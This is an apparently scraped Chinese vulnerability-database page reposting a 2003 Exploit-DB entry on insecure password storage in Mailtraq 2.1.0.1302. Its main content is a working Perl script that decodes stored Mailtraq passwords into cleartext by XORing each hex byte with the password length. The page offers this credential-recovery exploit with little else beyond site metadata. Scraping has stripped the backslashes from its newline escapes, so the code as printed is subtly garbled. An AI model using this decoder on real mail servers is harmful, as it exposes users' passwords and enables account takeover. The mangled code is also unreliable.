Mailtraq 2.1.0.1302 – User Password Encoding

Mailtraq 2.1.0.1302 – User Password Encoding

漏洞ID 1053965 漏洞类型
发布时间 2003-06-16 更新时间 2003-06-16
图片[1]-Mailtraq 2.1.0.1302 – User Password Encoding-安全小百科CVE编号 N/A
图片[2]-Mailtraq 2.1.0.1302 – User Password Encoding-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22779
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7923/info

It has been reported that Mailtraq does not securely store passwords. Because of this, an attacker may have an increased chance at gaining access to clear text passwords. 

#!/usr/bin/perl 

$Password = $ARGV[0]; 

print "Passwords should be something like: \3D66656463626160n"; 
print "Provided password: $Passwordn"; 

$Password = substr($Password, 3); 
$Length = length($Password)/2; 

print "Length: $Lengthn"; 

for ($i = 0; $i < $Length; $i++) 
{ 
 print "Decoding: ", substr($Password, $i*2, 2), " = "; 
 $ord = hex(substr($Password, $i*2, 2)); 

 print $ord^$Length, " (", chr($ord^$Length), ")n"; 
}

相关推荐: FTP服务器cwd命令路径暴露漏洞

FTP服务器cwd命令路径暴露漏洞 漏洞ID 1207589 漏洞类型 未知 发布时间 1997-01-01 更新时间 1997-01-01 CVE编号 CVE-1999-0201 CNNVD-ID CNNVD-199701-033 漏洞平台 N/A CVSS…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享